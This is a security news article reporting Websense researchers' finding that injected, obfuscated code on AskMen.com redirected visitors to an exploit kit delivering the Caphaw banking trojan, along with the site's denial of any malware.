Caphaw trojan being served up to visitors of AskMen.com, according to Websense

Share this article:
Study indicates that SQL injection continues to be a pervasive threat
Multiple pages across AskMen.com have been compromised to serve up a nasty trojan known as Caphaw.

A highly popular website that attracts more than 10 million visitors each month – AskMen.com – is now redirecting users to a nasty piece of malware known as Caphaw, according to researchers with Websense Security Labs.

The host master of AskMen.com has been notified by Websense, but the security firm has not received a response or acknowledgment, according to a Monday post by Abel Toro, a Websense security researcher.

In a Tuesday email correspondence, Alex Watson, director of security research with Websense, told SCMagazine.com that visitors are being redirected to the Caphaw trojan via code that was injected on multiple pages across AskMen.com.

It is a sneaky attack; the injected code loads automatically upon browsing to the main page, and silently redirects visitors to websites serving the exploit code, according to Toro, who added that the injected code is obfuscated and at the bottom of legitimate AskMen.com JavaScript pages.

“After visiting certain pages on Askmen.com, users were redirected to generated domains, where they would be exploited by a PDF or Java-based exploit – most likely via [the] Nuclear Pack exploit kit – and the Caphaw malware would be downloaded,” Watson said.

A variant of the Shylock banking trojan, Caphaw can be used to take control of infected systems, access files and folder via internal FTP server, redirect internet traffic via proxy server, send ICMP packets used in distributed denial-of-service attacks, and update itself.

“The Caphaw banking malware that was delivered by the exploit kit only affects Windows-based systems,” Watson said. “We have not seen any examples of users running iOS, Android, or Apple OS X being served different malware.”

The fact that no other publications from Ziff Davis – the company that acquired AskMen.com in 2013 – are being affected indicates that a local vulnerability, such as cross-site scripting (XSS), was most likely the vector used by attackers, Watson said.

AskMen.com did not respond to SCMagazine.com requests for comment.

UPDATE: "We've done a thorough investigation and there is no evidence of any malware," an AskMen.com spokesperson told SCMagazine.com in a Tuesday email correspondence. "We take security issues very seriously and we have multiple measures in place to protect our users. We're also in contact with the vendor who purported to see evidence of an attack."

Share this article:
You must be a registered member of SC Magazine to post a comment.

Sign up to our newsletters

More in News

CryptoWall surpasses CryptoLocker in infection rates

CryptoWall surpasses CryptoLocker in infection rates

A threat analysis from Dell SecureWorks CTU says that CryptoWall has picked up where its famous sibling left off.

Professor says Google search, not hacking, yielded medical info

Professor says Google search, not hacking, yielded medical ...

A professor of ethical hacking at City College San Francisco came forward to clarify that he did not demonstrate hacking a medical center's server in a class.

Syrian Malware Team makes use of enhanced BlackWorm RAT

Syrian Malware Team makes use of enhanced BlackWorm ...

FireEye analyzed the hacking group's use of the malware, dubbed the "Dark Edition" of BlackWorm.